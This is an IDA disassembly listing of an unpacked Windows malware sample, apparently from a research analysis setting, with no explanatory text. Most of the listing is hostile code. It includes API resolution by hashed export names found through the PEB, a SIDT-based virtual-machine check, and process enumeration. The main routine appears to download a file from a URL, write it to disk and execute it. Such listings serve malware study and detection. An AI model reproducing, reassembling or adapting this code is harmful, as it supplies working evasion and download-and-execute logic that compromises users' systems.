;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : 8D9D4C0E75182D2A06DACBADEA0A2AA7
; File Name : u:\work\8d9d4c0e75182d2a06dacbadea0a2aa7_unpacked.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 400000
; Section 1. (virtual address 00001000)
; Virtual size : 00005000 ( 20480.)
; Section size in file : 00005000 ( 20480.)
; Offset to raw data for section: 00001000
; Flags E0000080: Bss Executable Readable Writable
; Alignment : default
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
UPX0 segment para public 'CODE' use32
assume cs:UPX0
;org 401000h
assume es:nothing, ss:nothing, ds:UPX0, fs:nothing, gs:nothing
; =============== S U B R O U T I N E =======================================
sub_401000 proc near ; CODE XREF: sub_40102E+28�p
arg_0 = byte ptr 4
arg_4 = dword ptr 8
push esi
mov esi, [esp+4+arg_4]
lea ecx, [esi-1]
test ecx, ecx
push 2
pop eax
jz short loc_401015
loc_40100F: ; CODE XREF: sub_401000+13�j
imul eax, eax
dec ecx
jnz short loc_40100F
loc_401015: ; CODE XREF: sub_401000+D�j
movzx edx, [esp+4+arg_0]
push 8
pop ecx
sub ecx, esi
dec eax
shl eax, cl
and eax, edx
sar eax, cl
mov ecx, esi
shl edx, cl
pop esi
or eax, edx
retn
sub_401000 endp
; =============== S U B R O U T I N E =======================================
sub_40102E proc near ; CODE XREF: sub_401117:loc_401163�p
; sub_4014AE+227�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push esi
push edi
mov edi, [esp+8+arg_4]
push 100h
xor esi, esi
push esi
push edi
call sub_4010BB
add esp, 0Ch
cmp [esp+8+arg_8], esi
jle short loc_40106B
push ebx
mov ebx, [esp+0Ch+arg_0]
loc_401050: ; CODE XREF: sub_40102E+3A�j
movzx eax, byte ptr [ebx]
push 1
push eax
call sub_401000
not al
inc ebx
mov [esi+edi], al
inc esi
cmp esi, [esp+14h+arg_8]
pop ecx
pop ecx
jl short loc_401050
pop ebx
loc_40106B: ; CODE XREF: sub_40102E+1B�j
mov byte ptr [esi+edi], 0
pop edi
pop esi
retn
sub_40102E endp
; =============== S U B R O U T I N E =======================================
sub_401072 proc near ; CODE XREF: sub_401117:loc_4011C7�p
push esi
mov eax, fs:[eax+30h]
test eax, eax
js short loc_401087
mov eax, [eax+0Ch]
mov esi, [eax+1Ch]
lodsd
mov eax, [eax+8]
jmp short loc_401090
; ---------------------------------------------------------------------------
loc_401087: ; CODE XREF: sub_401072+7�j
mov eax, [eax+34h]
lea eax, [eax+7Ch]
mov eax, [eax+3Ch]
loc_401090: ; CODE XREF: sub_401072+13�j
pop esi
retn
sub_401072 endp
; ---------------------------------------------------------------------------
pop esi
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401094 proc near ; CODE XREF: sub_401C5C+1E6�p
var_7 = byte ptr -7
var_1 = byte ptr -1
push ebp
mov ebp, esp
sub esp, 8
mov [ebp+var_1], 0
sidt fword ptr [ebp+var_7]
mov eax, dword ptr [ebp+var_7+2]
and eax, 0FFF00000h
cmp eax, 0FFC00000h
jnz short loc_4010B5
mov [ebp+var_1], 1
loc_4010B5: ; CODE XREF: sub_401094+1B�j
movzx eax, [ebp+var_1]
leave
retn
sub_401094 endp
; =============== S U B R O U T I N E =======================================
sub_4010BB proc near ; CODE XREF: sub_40102E+F�p
; sub_4014AE+ED�p ...
arg_0 = dword ptr 4
arg_4 = byte ptr 8
arg_8 = dword ptr 0Ch
mov ecx, [esp+arg_8]
test ecx, ecx
jz short loc_4010E9
mov al, [esp+arg_4]
push ebx
mov bl, al
mov bh, bl
mov edx, ecx
push edi
mov edi, [esp+8+arg_0]
shr ecx, 2
mov eax, ebx
shl eax, 10h
mov ax, bx
rep stosd
mov ecx, edx
and ecx, 3
rep stosb
pop edi
pop ebx
loc_4010E9: ; CODE XREF: sub_4010BB+6�j
mov eax, [esp+arg_0]
retn
sub_4010BB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4010EE proc near ; CODE XREF: sub_4024C7+174�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
cmp [ebp+arg_8], 0
mov eax, [ebp+arg_4]
jz short loc_40110E
mov ecx, [ebp+arg_0]
sub ecx, eax
loc_4010FF: ; CODE XREF: sub_4010EE+1E�j
mov dl, [eax]
dec [ebp+arg_8]
mov [ecx+eax], dl
inc eax
cmp [ebp+arg_8], 0
jnz short loc_4010FF
loc_40110E: ; CODE XREF: sub_4010EE+A�j
mov eax, [ebp+arg_0]
pop ebp
retn
sub_4010EE endp
; =============== S U B R O U T I N E =======================================
sub_401113 proc near ; CODE XREF: sub_4024C7+C�p
mov eax, [esp+0]
retn
sub_401113 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401117 proc near ; CODE XREF: sub_401117+58�p
; sub_401304+53�p ...
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, dword_404104
add eax, 0FFFFFFBCh
sub esp, 0Ch
cmp eax, 95h
ja short loc_401132
inc dword_404104
loc_401132: ; CODE XREF: sub_401117+13�j
mov eax, [ebp+arg_0]
dec eax
push esi
jz loc_4011C7
dec eax
jz short loc_4011B8
dec eax
jz short loc_4011A9
dec eax
jz short loc_40119A
dec eax
jz short loc_40118B
dec eax
jz short loc_40117C
dec eax
jz short loc_401156
loc_40114F: ; CODE XREF: sub_401117+1B1�j
xor eax, eax
jmp loc_4012FC
; ---------------------------------------------------------------------------
loc_401156: ; CODE XREF: sub_401117+36�j
push 0Bh
mov esi, offset dword_404108
push esi
push offset dword_40305C
loc_401163: ; CODE XREF: sub_401117+72�j
; sub_401117+81�j ...
call sub_40102E
push 0C8AC8026h
push 1
call sub_401117
add esp, 14h
push esi
call eax
jmp short loc_4011CC
; ---------------------------------------------------------------------------
loc_40117C: ; CODE XREF: sub_401117+33�j
push 0Ch
mov esi, offset dword_404108
push esi
push offset dword_40304C
jmp short loc_401163
; ---------------------------------------------------------------------------
loc_40118B: ; CODE XREF: sub_401117+30�j
push 9
mov esi, offset dword_404108
push esi
push offset dword_403040
jmp short loc_401163
; ---------------------------------------------------------------------------
loc_40119A: ; CODE XREF: sub_401117+2D�j
push 0Bh
mov esi, offset dword_404108
push esi
push offset dword_403034
jmp short loc_401163
; ---------------------------------------------------------------------------
loc_4011A9: ; CODE XREF: sub_401117+2A�j
push 0Ah
mov esi, offset dword_404108
push esi
push offset dword_403028
jmp short loc_401163
; ---------------------------------------------------------------------------
loc_4011B8: ; CODE XREF: sub_401117+27�j
push 0Bh
mov esi, offset dword_404108
push esi
push offset loc_40301C
jmp short loc_401163
; ---------------------------------------------------------------------------
loc_4011C7: ; CODE XREF: sub_401117+20�j
call sub_401072
loc_4011CC: ; CODE XREF: sub_401117+63�j
mov edx, dword_404104
cmp edx, 0Ah
mov [ebp+arg_0], eax
jl short loc_4011E1
inc edx
mov dword_404104, edx
loc_4011E1: ; CODE XREF: sub_401117+C1�j
cmp edx, 0F5h
jle short loc_4011F2
push 15h
pop edx
mov dword_404104, edx
loc_4011F2: ; CODE XREF: sub_401117+D0�j
mov eax, [ebp+arg_0]
mov ecx, [eax+3Ch]
mov esi, [ecx+eax+78h]
lea ecx, [edx-6]
add esi, eax
cmp ecx, 0CEh
ja short loc_401210
inc edx
mov dword_404104, edx
loc_401210: ; CODE XREF: sub_401117+F0�j
mov ecx, [ebp+arg_4]
shr ecx, 10h
test cx, cx
jnz short loc_401227
movzx eax, word ptr [ebp+arg_4]
sub eax, [esi+10h]
jmp loc_4012CE
; ---------------------------------------------------------------------------
loc_401227: ; CODE XREF: sub_401117+102�j
cmp edx, 12h
jl short loc_401233
inc edx
mov dword_404104, edx
loc_401233: ; CODE XREF: sub_401117+113�j
cmp edx, 0ECh
jle short loc_401244
push 19h
pop edx
mov dword_404104, edx
loc_401244: ; CODE XREF: sub_401117+122�j
push ebx
mov ebx, [esi+24h]
add ebx, [ebp+arg_0]
push edi
mov edi, [esi+20h]
add edi, eax
lea eax, [edx-6]
cmp eax, 0D2h
mov [ebp+var_C], ebx
ja short loc_401265
inc edx
mov dword_404104, edx
loc_401265: ; CODE XREF: sub_401117+145�j
and [ebp+var_4], 0
cmp dword ptr [esi+18h], 0
jbe short loc_4012B1
loc_40126F: ; CODE XREF: sub_401117+198�j
mov ecx, [edi]
add ecx, [ebp+arg_0]
and [ebp+var_8], 0
mov al, [ecx]
test al, al
jz short loc_401296
loc_40127E: ; CODE XREF: sub_401117+17A�j
mov ebx, [ebp+var_8]
movsx eax, al
rol ebx, 7
xor ebx, eax
inc ecx
mov al, [ecx]
test al, al
mov [ebp+var_8], ebx
jnz short loc_40127E
mov ebx, [ebp+var_C]
loc_401296: ; CODE XREF: sub_401117+165�j
mov eax, [ebp+arg_4]
cmp [ebp+var_8], eax
jz short loc_4012FF
inc [ebp+var_4]
mov eax, [ebp+var_4]
add edi, 4
inc ebx
inc ebx
cmp eax, [esi+18h]
mov [ebp+var_C], ebx
jb short loc_40126F
loc_4012B1: ; CODE XREF: sub_401117+156�j
mov eax, [ebp+arg_0]
loc_4012B4: ; CODE XREF: sub_401117+1EB�j
cmp edx, 63h
pop edi
pop ebx
jge short loc_4012C2
inc edx
mov dword_404104, edx
loc_4012C2: ; CODE XREF: sub_401117+1A2�j
mov ecx, [ebp+var_4]
cmp ecx, [esi+18h]
jz loc_40114F
loc_4012CE: ; CODE XREF: sub_401117+10B�j
mov ecx, [esi+1Ch]
mov esi, [ebp+arg_0]
lea eax, [ecx+eax*4]
mov ecx, [eax+esi]
push 37h
pop eax
push 0FFFFFFE2h
pop edx
loc_4012E0: ; CODE XREF: sub_401117+1DB�j
cmp edx, 7Ch
ja short loc_4012E7
inc eax
inc edx
loc_4012E7: ; CODE XREF: sub_401117+1CC�j
add eax, 2Dh
add edx, 2Dh
cmp eax, 86h
jl short loc_4012E0
mov dword_404104, eax
lea eax, [ecx+esi]
loc_4012FC: ; CODE XREF: sub_401117+3A�j
pop esi
leave
retn
; ---------------------------------------------------------------------------
loc_4012FF: ; CODE XREF: sub_401117+185�j
movzx eax, word ptr [ebx]
jmp short loc_4012B4
sub_401117 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401304 proc near ; CODE XREF: sub_4029EF+15�p
var_94 = dword ptr -94h
var_84 = dword ptr -84h
push ebp
mov ebp, esp
sub esp, 94h
push 52h
pop eax
push 0FFFFFFEEh
pop ecx
loc_401313: ; CODE XREF: sub_401304+24�j
cmp ecx, 8Bh
ja short loc_40131D
inc eax
inc ecx
loc_40131D: ; CODE XREF: sub_401304+15�j
add eax, 21h
add ecx, 21h
cmp eax, 0BBh
jl short loc_401313
cmp byte_404209, 0
mov dword_404104, eax
jz short loc_40133F
mov al, byte_404208
leave
retn
; ---------------------------------------------------------------------------
loc_40133F: ; CODE XREF: sub_401304+32�j
push 9C480E24h
push 1
mov byte_404209, 1
mov [ebp+var_94], 94h
call sub_401117
pop ecx
pop ecx
lea ecx, [ebp+var_94]
push ecx
call eax
cmp [ebp+var_84], 2
setz al
cmp dword_404104, 0Fh
mov byte_404208, al
jl short loc_401385
inc dword_404104
loc_401385: ; CODE XREF: sub_401304+79�j
cmp dword_404104, 0F6h
jle short locret_40139B
mov dword_404104, 1Eh
locret_40139B: ; CODE XREF: sub_401304+8B�j
leave
retn
sub_401304 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40139D proc near ; CODE XREF: sub_4014AE+285�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov eax, dword_404104
add eax, 0FFFFFFACh
cmp eax, 0A2h
ja short loc_4013B6
inc dword_404104
loc_4013B6: ; CODE XREF: sub_40139D+11�j
push ebx
push esi
push edi
xor edi, edi
inc edi
cmp [ebp+arg_0], 0
jz loc_401476
mov esi, 99A4299Dh
push esi
push edi
call sub_401117
pop ecx
pop ecx
push [ebp+arg_0]
push edi
push edi
call eax
mov ebx, eax
test ebx, ebx
jz short loc_40141A
cmp dword_404104, 4Bh
jge short loc_4013F0
inc dword_404104
loc_4013F0: ; CODE XREF: sub_40139D+4B�j
push 0FDC94385h
push edi
call sub_401117
pop ecx
pop ecx
lea ecx, [ebp+var_4]
push ecx
push ebx
call eax
mov esi, [ebp+var_4]
push 9E6FA842h
push edi
call sub_401117
pop ecx
pop ecx
push esi
push ebx
call eax
jmp short loc_401479
; ---------------------------------------------------------------------------
loc_40141A: ; CODE XREF: sub_40139D+42�j
cmp dword_404104, 0Eh
jl short loc_401429
inc dword_404104
loc_401429: ; CODE XREF: sub_40139D+84�j
cmp dword_404104, 0DDh
jle short loc_40143F
mov dword_404104, 15h
loc_40143F: ; CODE XREF: sub_40139D+96�j
push esi
push edi
call sub_401117
pop ecx
pop ecx
push [ebp+arg_0]
push 0
push edi
call eax
push 9E6FA842h
push edi
mov ebx, eax
call sub_401117
pop ecx
pop ecx
push 0FFFFFFFFh
push ebx
call eax
push 723EB0D5h
push edi
call sub_401117
pop ecx
pop ecx
push ebx
call eax
jmp short loc_401479
; ---------------------------------------------------------------------------
loc_401476: ; CODE XREF: sub_40139D+23�j
mov ebx, [ebp+arg_0]
loc_401479: ; CODE XREF: sub_40139D+7B�j
; sub_40139D+D7�j
push 53h
pop eax
push 0FFFFFFFEh
pop ecx
loc_40147F: ; CODE XREF: sub_40139D+F5�j
cmp ecx, 85h
ja short loc_401489
inc eax
inc ecx
loc_401489: ; CODE XREF: sub_40139D+E8�j
add eax, 17h
add ecx, 17h
cmp eax, 6Ch
jl short loc_40147F
push 723EB0D5h
push edi
mov dword_404104, eax
call sub_401117
pop ecx
pop ecx
push ebx
call eax
pop edi
pop esi
pop ebx
leave
retn
sub_40139D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4014AE proc near ; CODE XREF: sub_4029EF+F2�p
; sub_4029EF+2A0�p
var_1318 = dword ptr -1318h
var_318 = byte ptr -318h
var_218 = byte ptr -218h
var_118 = byte ptr -118h
var_117 = byte ptr -117h
var_116 = byte ptr -116h
var_18 = byte ptr -18h
var_14 = byte ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 1318h
call sub_402D30
push 1Fh
pop eax
push 12h
pop ecx
loc_4014C1: ; CODE XREF: sub_4014AE+28�j
cmp ecx, 0BCh
ja short loc_4014CB
inc eax
inc ecx
loc_4014CB: ; CODE XREF: sub_4014AE+19�j
add eax, 27h
add ecx, 27h
cmp eax, 0AEh
jl short loc_4014C1
push ebx
push esi
push edi
push 774393E8h
push 1
mov dword_404104, eax
call sub_401117
pop ecx
pop ecx
mov ebx, 100h
push ebx
lea ecx, [ebp+var_318]
push ecx
push 0
call eax
push 8AC4909Bh
push 5
call sub_401117
pop ecx
pop ecx
lea ecx, [ebp+var_C]
push ecx
push 1000h
lea ecx, [ebp+var_1318]
push ecx
call eax
test eax, eax
jz loc_4017AE
mov eax, dword_404104
add eax, 0FFFFFFECh
cmp eax, 0C4h
ja short loc_40153C
inc dword_404104
loc_40153C: ; CODE XREF: sub_4014AE+86�j
and [ebp+var_4], 0
test [ebp+var_C], 0FFFFFFFCh
jbe loc_4017AE
mov edi, offset dword_404108
loc_401552: ; CODE XREF: sub_4014AE+2FA�j
mov eax, [ebp+var_4]
mov esi, [ebp+eax*4+var_1318]
test esi, esi
jz loc_40179C
cmp dword_404104, 93h
jge short loc_401576
inc dword_404104
loc_401576: ; CODE XREF: sub_4014AE+C0�j
push 99A4299Dh
push 1
call sub_401117
pop ecx
pop ecx
push esi
xor esi, esi
push esi
push 410h
call eax
push ebx
mov [ebp+var_8], eax
lea eax, [ebp+var_118]
push esi
push eax
call sub_4010BB
add esp, 0Ch
cmp [ebp+var_8], esi
jz loc_401789
push 189F16C9h
push 5
call sub_401117
pop ecx
pop ecx
lea ecx, [ebp+var_14]
push ecx
push 4
lea ecx, [ebp+var_10]
push ecx
push [ebp+var_8]
call eax
test eax, eax
jz loc_401789
mov eax, dword_404104
add eax, 0FFFFFFDDh
cmp eax, 0CCh
ja short loc_4015E6
inc dword_404104
loc_4015E6: ; CODE XREF: sub_4014AE+130�j
mov esi, [ebp+var_10]
push 0E4FB2191h
push 5
call sub_401117
pop ecx
pop ecx
push ebx
lea ecx, [ebp+var_118]
push ecx
push esi
push [ebp+var_8]
call eax
mov esi, dword_403008
lea eax, [ebp+var_118]
push eax
call esi ; lstrlen
test eax, eax
jz loc_401789
cmp [ebp+var_117], 3Ah
jnz loc_401789
cmp [ebp+var_116], 5Ch
jnz loc_401789
lea eax, [ebp+var_118]
push eax
call esi ; lstrlen
mov esi, eax
jmp short loc_401644
; ---------------------------------------------------------------------------
loc_401643: ; CODE XREF: sub_4014AE+19E�j
dec esi
loc_401644: ; CODE XREF: sub_4014AE+193�j
cmp [ebp+esi+var_118], 5Ch
jnz short loc_401643
push [ebp+arg_0]
call dword_403008 ; lstrlen
test eax, eax
jle short loc_4016A8
cmp dword_404104, 1
jl short loc_40166A
inc dword_404104
loc_40166A: ; CODE XREF: sub_4014AE+1B4�j
cmp dword_404104, 0E8h
jle short loc_401680
mov dword_404104, 15h
loc_401680: ; CODE XREF: sub_4014AE+1C6�j
push [ebp+arg_0]
lea eax, [ebp+esi+var_117]
push eax
call dword_403004 ; lstrcmpi
test eax, eax
jnz loc_401789
mov eax, [ebp+var_4]
mov eax, [ebp+eax*4+var_1318]
jmp loc_4017D0
; ---------------------------------------------------------------------------
loc_4016A8: ; CODE XREF: sub_4014AE+1AB�j
cmp dword_404104, 0Fh
jl short loc_4016B7
inc dword_404104
loc_4016B7: ; CODE XREF: sub_4014AE+201�j
cmp dword_404104, 0BFh
jle short loc_4016CD
mov dword_404104, 17h
loc_4016CD: ; CODE XREF: sub_4014AE+213�j
push 0Bh
push edi
push (offset loc_40306B+1)
call sub_40102E
push 8A94F707h
push 7
call sub_401117
add esp, 14h
lea ecx, [ebp+var_18]
push ecx
lea ecx, [ebp+var_118]
push ecx
call eax
test eax, eax
jnz loc_401789
lea eax, [ebp+var_318]
push eax
lea eax, [ebp+var_118]
push eax
call dword_403004 ; lstrcmpi
test eax, eax
jz short loc_401789
push edi
lea eax, [ebp+esi+var_117]
push eax
call dword_403004 ; lstrcmpi
test eax, eax
jz short loc_401789
mov eax, [ebp+var_4]
push [ebp+eax*4+var_1318]
call sub_40139D
pop ecx
lea eax, [ebp+var_118]
push eax
lea eax, [ebp+var_218]
push eax
call dword_403000 ; lstrcpy
push 1
push edi
push offset loc_403068
call sub_40102E
add esp, 0Ch
push edi
lea eax, [ebp+var_218]
push eax
call dword_40300C ; lstrcat
push 20E4E9EDh
push 1
call sub_401117
pop ecx
pop ecx
lea ecx, [ebp+var_218]
push ecx
lea ecx, [ebp+var_118]
push ecx
call eax
loc_401789: ; CODE XREF: sub_4014AE+F8�j
; sub_4014AE+11D�j ...
push 723EB0D5h
push 1
call sub_401117
pop ecx
pop ecx
push [ebp+var_8]
call eax
loc_40179C: ; CODE XREF: sub_4014AE+B0�j
mov eax, [ebp+var_C]
inc [ebp+var_4]
shr eax, 2
cmp [ebp+var_4], eax
jb loc_401552
loc_4017AE: ; CODE XREF: sub_4014AE+73�j
; sub_4014AE+99�j
push 49h
pop eax
push 8
pop ecx
loc_4017B4: ; CODE XREF: sub_4014AE+31B�j
cmp ecx, 0A1h
ja short loc_4017BE
inc eax
inc ecx
loc_4017BE: ; CODE XREF: sub_4014AE+30C�j
add eax, 2Dh
add ecx, 2Dh
cmp eax, 0A8h
jl short loc_4017B4
mov dword_404104, eax
loc_4017D0: ; CODE XREF: sub_4014AE+1F5�j
pop edi
pop esi
pop ebx
leave
retn
sub_4014AE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4017D5 proc near ; CODE XREF: sub_401C5C+287�p
; sub_401C5C+2FB�p ...
var_87C = byte ptr -87Ch
var_47C = byte ptr -47Ch
var_7C = dword ptr -7Ch
var_78 = byte ptr -78h
var_38 = byte ptr -38h
var_28 = byte ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
sub esp, 87Ch
mov eax, dword_404104
push ebx
xor ebx, ebx
add eax, 0FFFFFFC2h
cmp eax, 0B7h
mov [ebp+var_4], ebx
mov [ebp+var_14], ebx
mov [ebp+var_20], 7D0h
ja short loc_401803
inc dword_404104
loc_401803: ; CODE XREF: sub_4017D5+26�j
push esi
push edi
mov esi, 400h
push esi
lea eax, [ebp+var_87C]
push ebx
push eax
call sub_4010BB
push 534D481h
push 3
mov [ebp+var_18], esi
call sub_401117
add esp, 14h
lea ecx, [ebp+var_18]
push ecx
lea ecx, [ebp+var_87C]
push ecx
push ebx
call eax
push 5
mov edi, offset dword_404108
push edi
push offset dword_403078
call sub_40102E
add esp, 0Ch
push edi
lea eax, [ebp+var_87C]
push eax
call dword_40300C ; lstrcat
cmp dword_404104, 8
mov [ebp+var_1C], ebx
jl short loc_40186D
inc dword_404104
loc_40186D: ; CODE XREF: sub_4017D5+90�j
cmp dword_404104, 0A3h
jle short loc_401883
mov dword_404104, 25h
loc_401883: ; CODE XREF: sub_4017D5+A2�j
push 4
pop edi
loc_401886: ; CODE XREF: sub_4017D5+3FB�j
push 8593DD7h
push edi
call sub_401117
pop ecx
pop ecx
push ebx
push ebx
push ebx
push ebx
lea ecx, [ebp+var_87C]
push ecx
call eax
push 0B87DBD66h
push edi
mov [ebp+var_C], eax
call sub_401117
pop ecx
pop ecx
push ebx
push ebx
push ebx
push ebx
push [ebp+arg_0]
push [ebp+var_C]
call eax
cmp dword_404104, 5
mov [ebp+var_8], eax
jl short loc_4018CE
inc dword_404104
loc_4018CE: ; CODE XREF: sub_4017D5+F1�j
cmp dword_404104, 0F6h
jle short loc_4018E4
mov dword_404104, 14h
loc_4018E4: ; CODE XREF: sub_4017D5+103�j
push 1AD09C78h
push edi
call sub_401117
pop ecx
pop ecx
push edi
lea ecx, [ebp+var_20]
push ecx
push 2
push [ebp+var_C]
call eax
push 1AD09C78h
push edi
call sub_401117
pop ecx
pop ecx
push edi
lea ecx, [ebp+var_20]
push ecx
push 6
push [ebp+var_C]
call eax
push 1AD09C78h
push edi
call sub_401117
pop ecx
pop ecx
push edi
lea ecx, [ebp+var_20]
push ecx
push 5
push [ebp+var_C]
call eax
mov eax, dword_404104
add eax, 0FFFFFFF9h
cmp eax, 0C3h
ja short loc_401944
inc dword_404104
loc_401944: ; CODE XREF: sub_4017D5+167�j
push 2F5CE027h
push edi
mov [ebp+var_14], ebx
mov [ebp+var_4], edi
call sub_401117
pop ecx
pop ecx
push ebx
lea ecx, [ebp+var_4]
push ecx
lea ecx, [ebp+var_14]
push ecx
push 20000005h
push [ebp+var_8]
call eax
mov eax, [ebp+var_14]
lea ecx, [eax-401h]
cmp ecx, 48FDEh
ja loc_401AAE
cmp dword_404104, 0A8h
jge short loc_401991
inc dword_404104
loc_401991: ; CODE XREF: sub_4017D5+1B4�j
push 8F8F114h
push 1
call sub_401117
pop ecx
pop ecx
push ebx
push 80h
push edi
push ebx
push 2
push 40000000h
push [ebp+arg_4]
call eax
push esi
mov [ebp+var_10], eax
lea eax, [ebp+var_47C]
push ebx
push eax
mov [ebp+var_4], ebx
call sub_4010BB
push 1A212962h
push edi
mov [ebp+var_18], esi
call sub_401117
add esp, 14h
lea ecx, [ebp+var_4]
push ecx
push esi
lea ecx, [ebp+var_47C]
push ecx
push [ebp+var_8]
call eax
push 2Ah
test eax, eax
pop eax
push 0Ch
setnz cl
pop edx
loc_4019F4: ; CODE XREF: sub_4017D5+232�j
cmp edx, 0BEh
ja short loc_4019FE
inc eax
inc edx
loc_4019FE: ; CODE XREF: sub_4017D5+225�j
add eax, 19h
add edx, 19h
cmp eax, 7Fh
jl short loc_4019F4
mov dword_404104, eax
jmp short loc_401A74
; ---------------------------------------------------------------------------
loc_401A10: ; CODE XREF: sub_4017D5+2A2�j
cmp cl, bl
jz short loc_401A79
mov eax, [ebp+var_4]
push 0F3FD1C3h
push 1
mov [ebp+var_24], eax
call sub_401117
pop ecx
pop ecx
push ebx
lea ecx, [ebp+var_28]
push ecx
push [ebp+var_24]
lea ecx, [ebp+var_47C]
push ecx
push [ebp+var_10]
call eax
push esi
lea eax, [ebp+var_47C]
push ebx
push eax
call sub_4010BB
push 1A212962h
push edi
mov [ebp+var_18], esi
mov [ebp+var_4], ebx
call sub_401117
add esp, 14h
lea ecx, [ebp+var_4]
push ecx
push esi
lea ecx, [ebp+var_47C]
push ecx
push [ebp+var_8]
call eax
test eax, eax
setnz cl
loc_401A74: ; CODE XREF: sub_4017D5+239�j
cmp [ebp+var_4], ebx
ja short loc_401A10
loc_401A79: ; CODE XREF: sub_4017D5+23D�j
push 58h
pop eax
push 0FFFFFFFAh
pop ecx
loc_401A7F: ; CODE XREF: sub_4017D5+2BD�j
cmp ecx, 89h
ja short loc_401A89
inc eax
inc ecx
loc_401A89: ; CODE XREF: sub_4017D5+2B0�j
add eax, 19h
add ecx, 19h
cmp eax, 6Eh
jl short loc_401A7F
push 723EB0D5h
push 1
mov dword_404104, eax
call sub_401117
pop ecx
pop ecx
push [ebp+var_10]
call eax
jmp short loc_401AC1
; ---------------------------------------------------------------------------
loc_401AAE: ; CODE XREF: sub_4017D5+1A4�j
add eax, 0FFFFFFFEh
cmp eax, 3FEh
ja short loc_401AC1
mov [ebp+arg_8], bl
jmp short loc_401AC1
; ---------------------------------------------------------------------------
loc_401ABD: ; CODE XREF: sub_4017D5+312�j
cmp al, bl
jz short loc_401AE9
loc_401AC1: ; CODE XREF: sub_4017D5+2D7�j
; sub_4017D5+2E1�j ...
push 1A212962h
push edi
call sub_401117
pop ecx
pop ecx
lea ecx, [ebp+var_4]
push ecx
push esi
lea ecx, [ebp+var_47C]
push ecx
push [ebp+var_8]
call eax
test eax, eax
setnz al
cmp [ebp+var_4], ebx
ja short loc_401ABD
loc_401AE9: ; CODE XREF: sub_4017D5+2EA�j
cmp dword_404104, 6
jl short loc_401AF8
inc dword_404104
loc_401AF8: ; CODE XREF: sub_4017D5+31B�j
cmp dword_404104, 96h
jle short loc_401B0E
mov dword_404104, 1Ah
loc_401B0E: ; CODE XREF: sub_4017D5+32D�j
push 7314FB0Ch
push edi
call sub_401117
pop ecx
pop ecx
push [ebp+var_8]
call eax
push 7314FB0Ch
push edi
call sub_401117
pop ecx
pop ecx
push [ebp+var_C]
call eax
mov eax, dword_404104
add eax, 0FFFFFFCAh
cmp eax, 9Ah
ja short loc_401B47
inc dword_404104
loc_401B47: ; CODE XREF: sub_4017D5+36A�j
push 8F8F114h
push 1
call sub_401117
pop ecx
pop ecx
push ebx
push 80h
push 3
push ebx
push 1
push 80000000h
push [ebp+arg_4]
call eax
push 0AEF7CBF1h
push 1
mov [ebp+var_10], eax
call sub_401117
pop ecx
pop ecx
push ebx
push [ebp+var_10]
call eax
push 723EB0D5h
push 1
mov [ebp+var_24], eax
call sub_401117
pop ecx
pop ecx
push [ebp+var_10]
call eax
inc [ebp+var_1C]
cmp dword_404104, 5
jl short loc_401BA9
inc dword_404104
loc_401BA9: ; CODE XREF: sub_4017D5+3CC�j
cmp dword_404104, 0D0h
jle short loc_401BBF
mov dword_404104, 21h
loc_401BBF: ; CODE XREF: sub_4017D5+3DE�j
mov edx, [ebp+var_14]
cmp edx, [ebp+var_24]
jz short loc_401BD6
cmp [ebp+var_1C], 5
jge short loc_401BD6
cmp [ebp+arg_8], bl
jnz loc_401886
loc_401BD6: ; CODE XREF: sub_4017D5+3F0�j
; sub_4017D5+3F6�j
push 4Eh
pop eax
push 34h
pop ecx
pop edi
pop esi
loc_401BDE: ; CODE XREF: sub_4017D5+41E�j
cmp ecx, 0BBh
ja short loc_401BE8
inc eax
inc ecx
loc_401BE8: ; CODE XREF: sub_4017D5+40F�j
add eax, 2Dh
add ecx, 2Dh
cmp eax, 93h
jl short loc_401BDE
mov dword_404104, eax
lea eax, [edx-2]
cmp eax, 3FEh
ja short loc_401C08
xor eax, eax
jmp short loc_401C59
; ---------------------------------------------------------------------------
loc_401C08: ; CODE XREF: sub_4017D5+42D�j
cmp [ebp+arg_8], bl
jz short loc_401C56
add edx, 0FFFFFBFFh
cmp edx, 48FDEh
ja short loc_401C56
push 40h
lea eax, [ebp+var_78]
push ebx
push eax
mov [ebp+var_7C], 44h
call sub_4010BB
push 46318AC7h
push 1
call sub_401117
add esp, 14h
lea ecx, [ebp+var_38]
push ecx
lea ecx, [ebp+var_7C]
push ecx
push ebx
push ebx
push ebx
push ebx
push ebx
push ebx
push [ebp+arg_4]
push ebx
call eax
xor eax, eax
inc eax
